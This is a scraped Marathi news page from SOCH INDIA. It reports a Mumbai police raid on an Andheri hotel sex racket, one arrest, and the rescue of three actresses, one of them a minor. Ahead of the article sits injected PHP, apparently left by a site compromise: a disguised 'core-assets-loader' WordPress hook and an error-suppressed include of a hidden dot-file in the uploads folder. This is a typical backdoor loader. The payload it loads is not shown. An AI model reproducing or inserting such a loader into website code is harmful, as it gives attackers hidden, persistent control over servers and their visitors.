add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबईत हाय प्रोफाइल सेक्स रॅकेटचा पर्दाफाश, मराठी अभिनेत्रीची सुटका – SOCH INDIA
Menu

अपराध समाचार
मुंबईत हाय प्रोफाइल सेक्स रॅकेटचा पर्दाफाश, मराठी अभिनेत्रीची सुटका

nobanner

मुंबई पोलिसांनी पुन्हा एकदा हाय प्रोफाइल सेक्स रॅकेटचा पर्दाफाश केला आहे. अंधेरीमधील एका थ्री स्टार हॉटेलमध्ये हे सेक्स रॅकेट सुरु होते. पोलिसांनी यावेळी एका महिलेला अटक केली असून तीन महिला कलाकारांची सुटका करण्यात आली आहे. यामधील एक तरुणी अल्पवयीन असल्याची माहिती पोलिसांनी दिली आहे. पोलिसांच्या सामाजिक सेवा शाखेने अंधेरी पूर्वेकडील हॉटेलवर धाड टाकत ही कारवाई केली.

“धाड टाकली असता तीन महिलांना जबरदस्ती देहविक्रीय व्यवसायात ढकलण्यात आल्याचं समोर आलं. यामधील एक अल्पवयीन आहे. त्या सर्वांची सुटका करण्यात आली असून हे रॅकेट चालवणाऱ्या महिलेला अटक करण्यात आली आहे,” अशी माहिती पोलिसांनी दिली आहे. “आरोपी महिला कांदिवली पूर्वेला टुर्स अॅण्ड ट्रॅव्हल एजन्सी चालवत होती. अनेक बेकायदेशीर गोष्टींमध्ये तिचा सहभाग होता,” असंही पोलिसांनी सांगितलं आहे.

सुटका करण्यात आलेल्यांपैकी एक महिला अभिनेत्री आणि गायक असून टीव्ही क्राइम शो ‘सावधान इंडिया’मध्ये काम केलं आहे. तर दुसऱ्या महिलेने मराठी चित्रपट आणि मालिकांमध्ये काम केलं आहे. अल्पवयीन मुलीने बेव सीरिजमध्ये काम केलं असल्याचं पोलिसांनी सांगितलं आहे. आरोपी महिलेविरोधात गुन्हा दाखल करण्यात आला असून तपास सुरु आहे.